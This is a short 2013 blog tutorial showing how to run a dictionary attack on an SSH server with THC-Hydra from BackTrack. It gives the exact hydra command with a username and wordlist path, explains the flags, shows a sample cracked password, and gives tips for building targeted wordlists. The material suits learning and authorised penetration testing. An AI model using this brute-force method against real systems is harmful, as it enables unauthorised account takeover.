Friday, March 15, 2013

Attacking a server with SSH service using THC-Hydra

When we begin to learn about security we begin to hear that we need complex password to avoid to be hacked, other mention that the password era is gone, doesn't matter what they say we always use passwords and a lot of them are weak. So lets learn how we can do a dictionary attack using Hydra.

For this example we will use BackTrack, you can download the ISO image from here. You will need to boot the ISO in a virtual machine and Hydra is ready to use with a lot of tools. Click in the shell and type hydra.

Attacking a server with SSH service

Username: aadams
Wordlist: The one that it is coming from BackTrack 5 R3 located: /pentest/passwords/wordlists/darkc0de.lst

hydra -l aadams -P /pentest/passwords/wordlists/darkc0de.lst -f ssh

  • -l     login or username
  • -P    Password wordlist
  • -f     exit when a login/pass pair is found
Sure you can get all the options with just type hydra in the shell.


[22][ssh] host:   login: aadams   password: nostradamus

Tips when you run a dictionary attack

  1. It is better to use custom list according to the username we try to use like hobbies, field, industries, etc. For example it is a high probability that somebody who likes a lot animals use any password including animals, artist, etc, etc.
  2. Patience, run a big list with 1 Million possible passwords takes time.
  3. Try no to run extreme attack again the service, this could crash the service and you will miss time and the company where you are testing the security will be mad with you.

No comments:

Post a Comment